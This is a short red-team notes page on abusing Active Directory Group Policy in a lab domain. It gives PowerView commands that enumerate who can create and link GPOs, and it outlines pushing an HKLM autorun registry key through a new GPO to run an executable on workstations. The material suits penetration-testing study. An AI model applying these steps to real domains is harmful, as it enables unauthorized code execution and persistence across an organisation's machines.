search

Create & Link a GPO

hashtag
Find principals that can create new GPOs in the domain

powershell Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }

DEV\Developers
circle-info

Being able to create a GPO doesn't achieve anything unless it can be linked to an OU

hashtag
Look for linkable OU's

powershell Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier | fl

ObjectDN              : OU=Workstations,DC=dev,DC=cyberbotic,DC=io

This shows that members of the "Developers" group can link GPOs to the "Workstations" OU.

hashtag
Check if required module present on machine

powershell Get-Module -List -Name GroupPolicy | select -expand ExportedCommands

Backup-GPO                 Backup-GPO                
Block-GPInheritance        Block-GPInheritance       
Copy-GPO                   Copy-GPO                  
Get-GPInheritance          Get-GPInheritance         
Get-GPO                    Get-GPO

Necessary module not present? Use SharpGPO instead -> SharpGPO/SharpGPOAbuse

hashtag
Create and link a new GPO

Some abuses can be implemented directly using RSAT. For example, the Set-GPPrefRegistryValue cmdlet can be used to add an HKLM autorun key to the registry.

circle-info

Be sure executable is present in the share

hashtag
Next, apply the GPO to the target OU

circle-info

Remember that HKLM autoruns require a reboot to execute

Last updated